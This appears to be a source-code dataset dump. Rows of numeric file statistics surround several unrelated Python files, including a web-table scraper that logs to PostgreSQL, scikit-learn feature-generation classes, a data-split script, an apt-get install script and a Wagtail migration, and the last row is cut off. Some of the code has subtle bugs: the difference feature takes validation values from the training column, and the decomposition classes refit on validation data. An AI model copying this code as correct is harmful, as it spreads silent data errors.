| 37.511475 | 85 | 0.636832 | 3,167 | 22,882 | 4.3988 | 0.091885 | 0.009045 | 0.015505 | 0.048453 | 0.838203 | 0.832245 | 0.827722 | 0.819037 | 0.810064 | 0.794415 | 0 | 0.031442 | 0.218862 | 22,882 | 609 | 86 | 37.573071 | 0.747958 | 0.085744 | 0 | 0.786538 | 0 | 0 | 0.177041 | 0.100926 | 0 | 0 | 0 | 0.001642 | 0.109615 | 1 | 0.025 | false | 0 | 0.025 | 0 | 0.057692 | 0.001923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d19e0ab77be1eca905061c18c6895ba878ebf126 | 7,469 | py | Python | grazer_modules/tables.py | Andrew95496/hypergraze | 224719eb661a4069923355930ef3b5f0aca44dde | [
"MIT"
] | null | null | null | grazer_modules/tables.py | Andrew95496/hypergraze | 224719eb661a4069923355930ef3b5f0aca44dde | [
"MIT"
] | null | null | null | grazer_modules/tables.py | Andrew95496/hypergraze | 224719eb661a4069923355930ef3b5f0aca44dde | [
"MIT"
] | null | null | null | import sys
import os
sys.path.append(os.path.dirname(os.path.abspath('config.py')))
from bs4 import BeautifulSoup
from numpy import byte
import requests
import psycopg2
import pandas as pd
import datetime
import subprocess
from pathlib import Path
from tkinter import messagebox as mb
# My Modules
from configs import config as cf
CMD = '''
on run argv
display notification (item 2 of argv) with title (item 1 of argv)
end run
'''
def notify(title, text):
subprocess.call(['osascript', '-e', CMD, title, text])
downloads_path = str(Path.home() / "Downloads")
def find_all_tables_to_excel(URL,HTML_TAG, ATTR_NAME, FILENAME, FILETYPE):
CONN = psycopg2.connect(
host = cf.hostname,
dbname = cf.database,
user = cf.username,
password = cf.pwd,
port = cf.port_id)
CUR = CONN.cursor()
notify('HYPERGRAZE©', '(tables) database connected...')
res = requests.get(URL)
src = res.content
html = BeautifulSoup(src, 'lxml')
bytes = 0
count = 1
table = html.find_all('table', {'class': f'{ATTR_NAME}'})
tables = pd.read_html(str(table))
for table in tables:
table = pd.DataFrame(table)
table.to_excel( f'{downloads_path}/{FILENAME}{count}.xlsx')
size = os.path.getsize(f'{downloads_path}/{FILENAME}{count}.xlsx')
bytes += size
count += 1
mb.showinfo('Info', f'''All files sent to:\n {downloads_path}/\n
file size: {bytes} bytes
''')
#* Insert into database web_data
INSERT_SCRIPT = 'insert into web_data (url, html_tag, file_type, results, bytes, date) values (%s, %s, %s, %s, %s, %s);'
INSERT_VALUES = (URL, HTML_TAG, FILETYPE ,str(tables),bytes, datetime.datetime.now())
CUR.execute(INSERT_SCRIPT, INSERT_VALUES)
notify('HYPERGRAZE©', 'web_data entered')
#* Insert into database web_data
INSERT_SCRIPT = 'insert into user_data (url, html_tag, file_type, files, bytes, date) values (%s, %s, %s, %s, %s, %s);'
INSERT_VALUES = (URL, HTML_TAG, FILETYPE, count, bytes, datetime.datetime.now() )
CUR.execute(INSERT_SCRIPT, INSERT_VALUES)
notify('HYPERGRAZE©', 'user_data entered')
CONN.commit()
# ! ALL WAYS CLOSE CONNECTIONS
CUR.close()
CONN.close()
notify('HYPERGRAZE©', '(tables) database disconnected')
def find_all_tables_to_std(URL,HTML_TAG, ATTR_NAME, FILENAME, FILETYPE):
CONN = psycopg2.connect(
host = cf.hostname,
dbname = cf.database,
user = cf.username,
password = cf.pwd,
port = cf.port_id)
CUR = CONN.cursor()
notify('HYPERGRAZE©', '(tables) database connected...')
res = requests.get(URL)
src = res.content
html = BeautifulSoup(src, 'lxml')
bytes = 0
count = 1
table = html.find_all('table', {'class': f'{ATTR_NAME}'})
tables = pd.read_html(str(table))
for table in tables:
with open(f'{downloads_path}/{FILENAME}{count}.{FILETYPE}', 'w') as text_file:
text_file.write(str(table))
size = os.path.getsize(f'{downloads_path}/{FILENAME}{count}.{FILETYPE}')
bytes += size
count += 1
mb.showinfo('Info', f'''All files sent to:\n {downloads_path}/\n
file size: {bytes} bytes
''')
#* Insert into database
INSERT_SCRIPT = 'insert into web_data (url, html_tag, file_type, results, bytes, date) values (%s, %s, %s, %s, %s, %s);'
INSERT_VALUES = (URL, HTML_TAG, FILETYPE, str(tables), bytes, datetime.datetime.now())
CUR.execute(INSERT_SCRIPT, INSERT_VALUES)
notify('HYPERGRAZE©', 'web_data entered')
INSERT_SCRIPT = 'insert into user_data (url, html_tag, file_type, files, bytes, date) values (%s, %s, %s, %s, %s, %s);'
INSERT_VALUES = (URL, HTML_TAG, FILETYPE, count, bytes, datetime.datetime.now() )
CUR.execute(INSERT_SCRIPT, INSERT_VALUES)
notify('HYPERGRAZE©', 'user_data entered')
CONN.commit()
# ! ALL WAYS CLOSE CONNECTIONS
CUR.close()
CONN.close()
notify('HYPERGRAZE©', '(tables) database disconnected')
def find_one_table_to_std(URL,HTML_TAG, ATTR_NAME, FILENAME, FILETYPE):
CONN = psycopg2.connect(
host = cf.hostname,
dbname = cf.database,
user = cf.username,
password = cf.pwd,
port = cf.port_id)
CUR = CONN.cursor()
notify('HYPERGRAZE©', '(tables) database connected...')
res = requests.get(URL)
src = res.content
html = BeautifulSoup(src, 'lxml')
bytes = 0
count = 1
table = html.find('table', {'class': f'{ATTR_NAME}'})
table = table.get_text()
with open(f'{downloads_path}/{FILENAME}.{FILETYPE}', 'w') as text_file:
text_file.write(str(table))
size = os.path.getsize(f'{downloads_path}/{FILENAME}.{FILETYPE}')
bytes += size
mb.showinfo('Info', f'''file sent to:\n {downloads_path}/{FILENAME}.{FILETYPE}\n
file size: {bytes} bytes
''')
#* Insert into database
INSERT_SCRIPT = 'insert into web_data (url, html_tag, file_type, results, bytes, date) values (%s, %s, %s, %s, %s, %s);'
INSERT_VALUES = (URL, HTML_TAG, FILETYPE, str(table), bytes, datetime.datetime.now())
CUR.execute(INSERT_SCRIPT, INSERT_VALUES)
notify('HYPERGRAZE©', 'web_data entered')
INSERT_SCRIPT = 'insert into user_data (url, html_tag, file_type, files, bytes, date) values (%s, %s, %s, %s, %s, %s);'
INSERT_VALUES = (URL, HTML_TAG, FILETYPE, count, bytes, datetime.datetime.now() )
CUR.execute(INSERT_SCRIPT, INSERT_VALUES)
notify('HYPERGRAZE©', 'user_data entered')
CONN.commit()
# ! ALL WAYS CLOSE CONNECTIONS
CUR.close()
CONN.close()
notify('HYPERGRAZE©', '(tables) database disconnected')
def find_one_table_to_excel(URL,HTML_TAG, ATTR_NAME, FILENAME, FILETYPE):
CONN = psycopg2.connect(
host = cf.hostname,
dbname = cf.database,
user = cf.username,
password = cf.pwd,
port = cf.port_id)
CUR = CONN.cursor()
notify('HYPERGRAZE©', '(tables) database connected...')
res = requests.get(URL)
src = res.content
html = BeautifulSoup(src, 'lxml')
notify('HYPERGRAZE©', 'grazing the web...')
bytes = 0
count = 1
table = html.find('table', {'class': f'{ATTR_NAME}'})
table = pd.read_html(str(table))
table = pd.DataFrame(table[0])
table.to_excel( f'{downloads_path}/{FILENAME}.xlsx' )
bytes = os.path.getsize(f'{downloads_path}/{FILENAME}.{FILETYPE}')
mb.showinfo('Info', f'''file sent to:\n {downloads_path}/{FILENAME}.{FILETYPE}\n
file size: {bytes} bytes
''')
#* Insert into database
INSERT_SCRIPT = 'insert into web_data (url, html_tag, file_type, results, bytes, date) values (%s, %s, %s, %s, %s, %s);'
INSERT_VALUES = (URL, HTML_TAG, FILETYPE, str(table), bytes, datetime.datetime.now())
CUR.execute(INSERT_SCRIPT, INSERT_VALUES)
notify('HYPERGRAZE©', 'web_data entered')
INSERT_SCRIPT = 'insert into user_data (url, html_tag, file_type, files, bytes, date) values (%s, %s, %s, %s, %s, %s);'
INSERT_VALUES = (URL, HTML_TAG, FILETYPE, count, bytes, datetime.datetime.now() )
CUR.execute(INSERT_SCRIPT, INSERT_VALUES)
notify('HYPERGRAZE©', 'user_data entered')
CONN.commit()
# ! ALL WAYS CLOSE CONNECTIONS
CUR.close()
CONN.close()
notify('HYPERGRAZE©', '(tables) database disconnected')
| 32.333333 | 124 | 0.633418 | 994 | 7,469 | 4.644869 | 0.129779 | 0.017327 | 0.020793 | 0.020793 | 0.885423 | 0.87611 | 0.857483 | 0.842755 | 0.831709 | 0.815465 | 0 | 0.003255 | 0.218369 | 7,469 | 230 | 125 | 32.473913 | 0.784687 | 0.034007 | 0 | 0.769697 | 0 | 0.048485 | 0.319217 | 0.054707 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030303 | false | 0.024242 | 0.072727 | 0 | 0.10303 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d1b92c52bde86a70804f8bd2b3d4e7a7b9ae81e4 | 49 | py | Python | tests/context.py | ISalimzhanov/devops_lab1 | ea9b271d5d6fed3f85b2c90f61f4a9dd13c5ece2 | [
"PSF-2.0"
] | null | null | null | tests/context.py | ISalimzhanov/devops_lab1 | ea9b271d5d6fed3f85b2c90f61f4a9dd13c5ece2 | [
"PSF-2.0"
] | null | null | null | tests/context.py | ISalimzhanov/devops_lab1 | ea9b271d5d6fed3f85b2c90f61f4a9dd13c5ece2 | [
"PSF-2.0"
] | null | null | null | import web_app
import web_app.helpers as helpers
| 16.333333 | 33 | 0.857143 | 9 | 49 | 4.444444 | 0.555556 | 0.45 | 0.6 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.122449 | 49 | 2 | 34 | 24.5 | 0.930233 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
d1dffb9160ddd2622356a58cb27b82ad299e3c74 | 10,839 | py | Python | features/feature_generation_strategy.py | jmrozanec/features-generator | 0772394cf1c4a56a88c8a8faba2e5c84b4b2883f | [
"Apache-2.0"
] | 3 | 2018-07-19T14:37:37.000Z | 2021-06-03T12:44:22.000Z | features/feature_generation_strategy.py | jmrozanec/features-generator | 0772394cf1c4a56a88c8a8faba2e5c84b4b2883f | [
"Apache-2.0"
] | null | null | null | features/feature_generation_strategy.py | jmrozanec/features-generator | 0772394cf1c4a56a88c8a8faba2e5c84b4b2883f | [
"Apache-2.0"
] | 2 | 2020-02-22T20:14:48.000Z | 2020-12-03T19:42:03.000Z | from sklearn.decomposition import PCA, TruncatedSVD, FastICA
from sklearn.random_projection import GaussianRandomProjection, SparseRandomProjection
import abc
class FeatureGenerationStrategyFactory(object):
def create(strategy_name):
if strategy_name == "sum": return SumFeatureGenerationStrategy()
if strategy_name == "diff": return DiffFeatureGenerationStrategy()
if strategy_name == "prod": return ProdFeatureGenerationStrategy()
if strategy_name == "div": return DivFeatureGenerationStrategy()
if strategy_name == "avg": return AvgFeatureGenerationStrategy()
if strategy_name == "max": return MaxFeatureGenerationStrategy()
if strategy_name == "pca": return PCAFeatureGenerationStrategy()
if strategy_name == "tsvd": return TSVDFeatureGenerationStrategy()
if strategy_name == "ica": return ICAFeatureGenerationStrategy()
if strategy_name == "grp": return GRPFeatureGenerationStrategy()
if strategy_name == "srp": return SRPFeatureGenerationStrategy()
class ColumnBasedFeatureGenerationStrategyAbstract(object):
"""Provides abstraction for features generation"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def generate(self, train, val, test, colname1, colname2):
"""Required Method"""
@abc.abstractmethod
def featurename(self, colname1, colname2):
"""Required Method"""
@abc.abstractmethod
def equivalent_featurenames(self, colname1, colname2):
"""Required Method. Used to reflect commutativity."""
class SumFeatureGenerationStrategy(ColumnBasedFeatureGenerationStrategyAbstract):
def generate(self, train, val, test, colname1, colname2):
train[self.featurename(colname1, colname2)] = train[[colname1, colname2]].sum(axis=1)
val[self.featurename(colname1, colname2)] = val[[colname1, colname2]].sum(axis=1)
test[self.featurename(colname1, colname2)] = test[[colname1, colname2]].sum(axis=1)
return (train, val, test)
def featurename(self, colname1, colname2):
return "{}_sum_{}".format(colname1, colname2)
def equivalent_featurenames(self, colname1, colname2):
return [self.featurename(colname1, colname2), self.featurename(colname2, colname1)]
class DiffFeatureGenerationStrategy(ColumnBasedFeatureGenerationStrategyAbstract):
def generate(self, train, val, test, colname1, colname2):
train[self.featurename(colname1, colname2)]=train[colname1]-train[colname2]
val[self.featurename(colname1, colname2)]=train[colname1]-val[colname2]
test[self.featurename(colname1, colname2)]=test[colname1]-test[colname2]
return (train, val, test)
def featurename(self, colname1, colname2):
return "{}_diff_{}".format(colname1, colname2)
def equivalent_featurenames(self, colname1, colname2):
return [self.featurename(colname1, colname2)]
class ProdFeatureGenerationStrategy(ColumnBasedFeatureGenerationStrategyAbstract):
def generate(self, train, val, test, colname1, colname2):
train[self.featurename(colname1, colname2)]=train[colname1]*train[colname2]
val[self.featurename(colname1, colname2)]=val[colname1]*val[colname2]
test[self.featurename(colname1, colname2)]=test[colname1]*test[colname2]
return (train, val, test)
def featurename(self, colname1, colname2):
return "{}_prod_{}".format(colname1, colname2)
def equivalent_featurenames(self, colname1, colname2):
return [self.featurename(colname1, colname2), self.featurename(colname2, colname1)]
class DivFeatureGenerationStrategy(ColumnBasedFeatureGenerationStrategyAbstract):
def generate(self, train, val, test, colname1, colname2):
train[self.featurename(colname1, colname2)]=train[colname1]/train[colname2]
val[self.featurename(colname1, colname2)]=val[colname1]/val[colname2]
test[self.featurename(colname1, colname2)]=test[colname1]/test[colname2]
return (train, val, test)
def featurename(self, colname1, colname2):
return "{}_div_{}".format(colname1, colname2)
def equivalent_featurenames(self, colname1, colname2):
return [self.featurename(colname1, colname2)]
class AvgFeatureGenerationStrategy(ColumnBasedFeatureGenerationStrategyAbstract):
def generate(self, train, val, test, colname1, colname2):
train[self.featurename(colname1, colname2)]=train[[colname1, colname2]].mean(axis=1)
val[self.featurename(colname1, colname2)]=val[[colname1, colname2]].mean(axis=1)
test[self.featurename(colname1, colname2)]=test[[colname1, colname2]].mean(axis=1)
return (train, val, test)
def featurename(self, colname1, colname2):
return "{}_avg_{}".format(colname1, colname2)
def equivalent_featurenames(self, colname1, colname2):
return [self.featurename(colname1, colname2), self.featurename(colname2, colname1)]
class MaxFeatureGenerationStrategy(ColumnBasedFeatureGenerationStrategyAbstract):
def generate(self, train, val, test, colname1, colname2):
train[self.featurename(colname1, colname2)]=train[[colname1, colname2]].max(axis=1)
val[self.featurename(colname1, colname2)]=val[[colname1, colname2]].max(axis=1)
test[self.featurename(colname1, colname2)]=test[[colname1, colname2]].max(axis=1)
return (train, val, test)
def featurename(self, colname1, colname2):
return "{}_max_{}".format(colname1, colname2)
def equivalent_featurenames(self, colname1, colname2):
return [self.featurename(colname1, colname2), self.featurename(colname2, colname1)]
class MinFeatureGenerationStrategy(ColumnBasedFeatureGenerationStrategyAbstract):
def generate(self, train, val, test, colname1, colname2):
train[self.featurename(colname1, colname2)]=train[[colname1, colname2]].min(axis=1)
val[self.featurename(colname1, colname2)]=val[[colname1, colname2]].min(axis=1)
test[self.featurename(colname1, colname2)]=test[[colname1, colname2]].min(axis=1)
return (train, val, test)
def featurename(self, colname1, colname2):
return "{}_min_{}".format(colname1, colname2)
def equivalent_featurenames(self, colname1, colname2):
return [self.featurename(colname1, colname2), self.featurename(colname2, colname1)]
# Features based on decomposition methods
class DecompositionBasedFeatureGenerationStrategyAbstract(object):
"""Provides abstraction for features generation"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def generate(self, train, val, test):
"""Required Method"""
@abc.abstractmethod
def featurename(self, idx):
"""Required Method"""
@abc.abstractmethod
def equivalent_featurenames(self, idx):
"""Required Method. Used to reflect commutativity."""
class PCAFeatureGenerationStrategy(DecompositionBasedFeatureGenerationStrategyAbstract):
def generate(self, train, val, test, n_comps):
decomposer = PCA(n_components=n_comps, random_state=1234)
results_train = decomposer.fit_transform(train)
results_val = decomposer.fit_transform(val)
results_test = decomposer.transform(test)
for i in range(1, n_comps + 1):
train[self.featurename(i)] = results_train[:, i - 1]
val[self.featurename(i)] = results_val[:, i - 1]
test[self.featurename(i)] = results_test[:, i - 1]
return (train, val, test)
def featurename(self, idx):
return "pca_{}".format(str(idx))
def equivalent_featurenames(self, idx):
return [self.featurename(idx)]
class TSVDFeatureGenerationStrategy(DecompositionBasedFeatureGenerationStrategyAbstract):
def generate(self, train, val, test, n_comps):
decomposer = TruncatedSVD(n_components=n_comps, random_state=1234)
results_train = decomposer.fit_transform(train)
results_val = decomposer.fit_transform(val)
results_test = decomposer.transform(test)
for i in range(1, n_comps + 1):
train[self.featurename(i)] = results_train[:, i - 1]
val[self.featurename(i)] = results_val[:, i - 1]
test[self.featurename(i)] = results_test[:, i - 1]
return (train, val, test)
def featurename(self, idx):
return "tsvd_{}".format(str(idx))
def equivalent_featurenames(self, idx):
return [self.featurename(idx)]
class ICAFeatureGenerationStrategy(DecompositionBasedFeatureGenerationStrategyAbstract):
def generate(self, train, val, test, n_comps):
decomposer = FastICA(n_components=n_comps, random_state=1234)
results_train = decomposer.fit_transform(train)
results_val = decomposer.fit_transform(val)
results_test = decomposer.transform(test)
for i in range(1, n_comps + 1):
train[self.featurename(i)] = results_train[:, i - 1]
val[self.featurename(i)] = results_val[:, i - 1]
test[self.featurename(i)] = results_test[:, i - 1]
return (train, val, test)
def featurename(self, idx):
return "ica_{}".format(str(idx))
def equivalent_featurenames(self, idx):
return [self.featurename(idx)]
class GRPFeatureGenerationStrategy(DecompositionBasedFeatureGenerationStrategyAbstract):
def generate(self, train, val, test, n_comps):
decomposer = GaussianRandomProjection(n_components=n_comps, random_state=1234)
results_train = decomposer.fit_transform(train)
results_val = decomposer.fit_transform(val)
results_test = decomposer.transform(test)
for i in range(1, n_comps + 1):
train[self.featurename(i)] = results_train[:, i - 1]
val[self.featurename(i)] = results_val[:, i - 1]
test[self.featurename(i)] = results_test[:, i - 1]
return (train, val, test)
def featurename(self, idx):
return "grp_{}".format(str(idx))
def equivalent_featurenames(self, idx):
return [self.featurename(idx)]
class SRPFeatureGenerationStrategy(DecompositionBasedFeatureGenerationStrategyAbstract):
def generate(self, train, val, test, n_comps):
decomposer = SparseRandomProjection(n_components=n_comps, random_state=1234)
results_train = decomposer.fit_transform(train)
results_val = decomposer.fit_transform(val)
results_test = decomposer.transform(test)
for i in range(1, n_comps + 1):
train[self.featurename(i)] = results_train[:, i - 1]
val[self.featurename(i)] = results_val[:, i - 1]
test[self.featurename(i)] = results_test[:, i - 1]
return (train, val, test)
def featurename(self, idx):
return "grp_{}".format(str(idx))
def equivalent_featurenames(self, idx):
return [self.featurename(idx)]
| 46.320513 | 93 | 0.703109 | 1,122 | 10,839 | 6.686275 | 0.081105 | 0.151426 | 0.085844 | 0.115702 | 0.819515 | 0.813916 | 0.811117 | 0.783924 | 0.765796 | 0.765796 | 0 | 0.02554 | 0.179998 | 10,839 | 233 | 94 | 46.519313 | 0.818519 | 0.026755 | 0 | 0.621469 | 0 | 0 | 0.012562 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.242938 | false | 0 | 0.016949 | 0.135593 | 0.559322 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 9 |
d1f17a122ce911147b1674ee9071df53b23f342a | 935 | py | Python | shhs/partition_cv.py | GuanLab/DeepSleep | 220ae1348aaaba115b82d89a9a5ab5bb6f569062 | [
"MIT"
] | 27 | 2019-04-26T21:12:52.000Z | 2022-03-13T15:51:18.000Z | shhs/partition_cv.py | Hongyang449/DeepSleep | f779e050e4ad1ba7b96ddf0c9aef421770bbbd53 | [
"MIT"
] | 3 | 2021-07-20T15:35:07.000Z | 2021-11-12T15:35:52.000Z | shhs/partition_cv.py | GuanLab/DeepSleep | 220ae1348aaaba115b82d89a9a5ab5bb6f569062 | [
"MIT"
] | 9 | 2019-06-12T20:10:24.000Z | 2021-12-08T12:45:36.000Z | #!/usr/bin/env python
import os
import sys
import numpy as np
import scipy.io
id_all=[]
f=open('id1.txt','r')
for line in f:
id_all.append(line.rstrip())
f.close()
# shuffle
id_all=np.array(id_all[:1000])
np.random.seed(449)
index=np.arange(len(id_all))
np.random.shuffle(index)
id_all=id_all[index]
f=open('id_train1.dat', 'w')
for the_id in id_all[:750]:
f.write('%s\n' % the_id)
f.close()
f=open('id_test1.dat', 'w')
for the_id in id_all[750:]:
f.write('%s\n' % the_id)
f.close()
id_all=[]
f=open('id2.txt','r')
for line in f:
id_all.append(line.rstrip())
f.close()
# shuffle
id_all=np.array(id_all[:1000])
np.random.seed(449)
index=np.arange(len(id_all))
np.random.shuffle(index)
id_all=id_all[index]
f=open('id_train2.dat', 'w')
for the_id in id_all[:750]:
f.write('%s\n' % the_id)
f.close()
f=open('id_test2.dat', 'w')
for the_id in id_all[750:]:
f.write('%s\n' % the_id)
f.close()
| 13.955224 | 32 | 0.652406 | 189 | 935 | 3.068783 | 0.243386 | 0.155172 | 0.048276 | 0.068966 | 0.813793 | 0.813793 | 0.813793 | 0.813793 | 0.813793 | 0.813793 | 0 | 0.039702 | 0.137968 | 935 | 66 | 33 | 14.166667 | 0.679901 | 0.038503 | 0 | 0.75 | 0 | 0 | 0.097506 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1 | 0 | 0.1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ae525544f801d03ab0f54567a9fb943d7bd7aaa4 | 174 | py | Python | setup-transmission.py | krthkj/pythonDumps | 92bc29d15ae5a677fbffc89dc0c6053d62a30e60 | [
"MIT"
] | null | null | null | setup-transmission.py | krthkj/pythonDumps | 92bc29d15ae5a677fbffc89dc0c6053d62a30e60 | [
"MIT"
] | null | null | null | setup-transmission.py | krthkj/pythonDumps | 92bc29d15ae5a677fbffc89dc0c6053d62a30e60 | [
"MIT"
] | null | null | null | #!/usr/bin/python
import subprocess
subprocess.call( ["sudo","apt-get", "-fy", "update"])
subprocess.call( ["sudo","apt-get", "-fy", "install" , "transmission-daemon"])
| 17.4 | 78 | 0.637931 | 21 | 174 | 5.285714 | 0.666667 | 0.252252 | 0.324324 | 0.378378 | 0.468468 | 0.468468 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103448 | 174 | 9 | 79 | 19.333333 | 0.711538 | 0.091954 | 0 | 0 | 0 | 0 | 0.38961 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
ae5d32448ff29d19231d64012bf70364facbf55e | 4,305 | py | Python | kehmet/migrations/0006_add_collapsible_block.py | HotStew/digihel | 3a53f6542b41c64c818fa34cc0709cdbfb8055db | [
"MIT"
] | 21 | 2016-08-22T10:15:24.000Z | 2022-03-23T08:10:48.000Z | kehmet/migrations/0006_add_collapsible_block.py | HotStew/digihel | 3a53f6542b41c64c818fa34cc0709cdbfb8055db | [
"MIT"
] | 101 | 2016-08-08T07:52:44.000Z | 2021-06-17T20:18:59.000Z | kehmet/migrations/0006_add_collapsible_block.py | HotStew/digihel | 3a53f6542b41c64c818fa34cc0709cdbfb8055db | [
"MIT"
] | 16 | 2016-08-02T11:45:26.000Z | 2021-02-18T11:27:34.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-08-17 17:02
from __future__ import unicode_literals
from django.db import migrations
import wagtail.contrib.table_block.blocks
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.images.blocks
import wagtail_svgmap.blocks
class Migration(migrations.Migration):
dependencies = [
('kehmet', '0005_kehmetcontentpage_show_in_submenus'),
]
operations = [
migrations.AlterField(
model_name='kehmetcontentpage',
name='body',
field=wagtail.core.fields.StreamField((('heading', wagtail.core.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.core.blocks.RichTextBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('table', wagtail.contrib.table_block.blocks.TableBlock()), ('image_map', wagtail.core.blocks.StructBlock((('map', wagtail_svgmap.blocks._ImageMapChoiceBlock(label='Image map', required=True)), ('css_class', wagtail.core.blocks.CharBlock(label='CSS class', required=False))))), ('two_columns', wagtail.core.blocks.StructBlock((('left_column', wagtail.core.blocks.StreamBlock((('heading', wagtail.core.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.core.blocks.RichTextBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('table', wagtail.contrib.table_block.blocks.TableBlock()), ('image_map', wagtail.core.blocks.StructBlock((('map', wagtail_svgmap.blocks._ImageMapChoiceBlock(label='Image map', required=True)), ('css_class', wagtail.core.blocks.CharBlock(label='CSS class', required=False)))))), icon='arrow-left', label='Left column content')), ('right_column', wagtail.core.blocks.StreamBlock((('heading', wagtail.core.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.core.blocks.RichTextBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('table', wagtail.contrib.table_block.blocks.TableBlock()), ('image_map', wagtail.core.blocks.StructBlock((('map', wagtail_svgmap.blocks._ImageMapChoiceBlock(label='Image map', required=True)), ('css_class', wagtail.core.blocks.CharBlock(label='CSS class', required=False)))))), icon='arrow-right', label='Right column content'))))), ('collapsible', wagtail.core.blocks.RichTextBlock(icon='collapse-down', label='Collapsible paragraph', template='content/blocks/collapsible.html')))),
),
migrations.AlterField(
model_name='kehmetfrontpage',
name='body',
field=wagtail.core.fields.StreamField((('heading', wagtail.core.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.core.blocks.RichTextBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('table', wagtail.contrib.table_block.blocks.TableBlock()), ('image_map', wagtail.core.blocks.StructBlock((('map', wagtail_svgmap.blocks._ImageMapChoiceBlock(label='Image map', required=True)), ('css_class', wagtail.core.blocks.CharBlock(label='CSS class', required=False))))), ('two_columns', wagtail.core.blocks.StructBlock((('left_column', wagtail.core.blocks.StreamBlock((('heading', wagtail.core.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.core.blocks.RichTextBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('table', wagtail.contrib.table_block.blocks.TableBlock()), ('image_map', wagtail.core.blocks.StructBlock((('map', wagtail_svgmap.blocks._ImageMapChoiceBlock(label='Image map', required=True)), ('css_class', wagtail.core.blocks.CharBlock(label='CSS class', required=False)))))), icon='arrow-left', label='Left column content')), ('right_column', wagtail.core.blocks.StreamBlock((('heading', wagtail.core.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.core.blocks.RichTextBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('table', wagtail.contrib.table_block.blocks.TableBlock()), ('image_map', wagtail.core.blocks.StructBlock((('map', wagtail_svgmap.blocks._ImageMapChoiceBlock(label='Image map', required=True)), ('css_class', wagtail.core.blocks.CharBlock(label='CSS class', required=False)))))), icon='arrow-right', label='Right column content'))))), ('collapsible', wagtail.core.blocks.RichTextBlock(icon='collapse-down', label='Collapsible paragraph', template='content/blocks/collapsible.html')))),
),
]
| 138.870968 | 1,812 | 0.741231 | 491 | 4,305 | 6.399185 | 0.160896 | 0.126034 | 0.178549 | 0.0993 | 0.875239 | 0.865691 | 0.865691 | 0.865691 | 0.865691 | 0.865691 | 0 | 0.005275 | 0.075261 | 4,305 | 30 | 1,813 | 143.5 | 0.783974 | 0.015796 | 0 | 0.347826 | 1 | 0 | 0.20666 | 0.023855 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.304348 | 0 | 0.434783 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 10 |
ae6c8733cae6be5a430c9360e8225a20dd9374ae | 297 | py | Python | timebomb/forms/__init__.py | thmslmr/timebomb-client | a57fdbb8bfc0157d2c3d713496ab4819fb33f1fd | [
"MIT"
] | 1 | 2020-03-31T17:17:40.000Z | 2020-03-31T17:17:40.000Z | timebomb/forms/__init__.py | thmslmr/timebomb-client | a57fdbb8bfc0157d2c3d713496ab4819fb33f1fd | [
"MIT"
